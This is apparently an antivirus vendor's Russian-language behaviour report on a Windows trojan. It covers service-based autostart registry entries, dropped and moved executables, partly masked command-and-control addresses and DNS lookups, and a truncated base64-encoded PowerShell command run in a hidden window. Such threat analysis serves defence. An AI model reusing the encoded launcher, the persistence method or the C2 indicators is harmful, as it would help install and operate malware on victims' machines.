Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\KBDCZ1] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\KBDCZ1] 'ImagePath' = '"%WINDIR%\SysWOW64\D3DCompiler_34\KBDCZ1.exe"'
Создает следующие сервисы
- 'KBDCZ1' "%WINDIR%\SysWOW64\D3DCompiler_34\KBDCZ1.exe"
- 'KBDCZ1' %WINDIR%\SysWOW64\D3DCompiler_34\KBDCZ1.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAGEAZQBwAHQAbwB1AHAAbQBvAHoAcQB1AGEAcQB1AGcAdQByAD0AJwBnAGEAaQByAGYAbwBvAHYAdwBpAGEAdABoAHQAYQBlAGcAcABvAHUAbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6AD...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\677.exe
Удаляет следующие файлы
- %WINDIR%\syswow64\d3dcompiler_34\kbdcz1.exe
Перемещает следующие файлы
- %HOMEPATH%\677.exe в %WINDIR%\syswow64\d3dcompiler_34\kbdcz1.exe
Сетевая активность
Подключается к
- '10#.#17.53.230':443
- '21#.#1.142.238':8080
TCP
Запросы HTTP POST
- http://21#.##.142.238:8080/bN0tnIHbb/wu4axsFfpKOwAoMxc/SAd2AtVhjF/gD8MJpXT/wDu4K2kn/ErKfgcvP/ via 21#.#1.142.238
UDP
- DNS ASK to###meus.com
- DNS ASK cp##s.net
- DNS ASK ty##s2c.com
- DNS ASK th####erservice.com
- DNS ASK ss##e.com
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\677.exe'
- '%WINDIR%\syswow64\d3dcompiler_34\kbdcz1.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAGEAZQBwAHQAbwB1AHAAbQBvAHoAcQB1AGEAcQB1AGcAdQByAD0AJwBnAGEAaQByAGYAbwBvAHYAdwBpAGEAdABoAHQAYQBlAGcAcABvAHUAbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6AD...' (со скрытым окном)
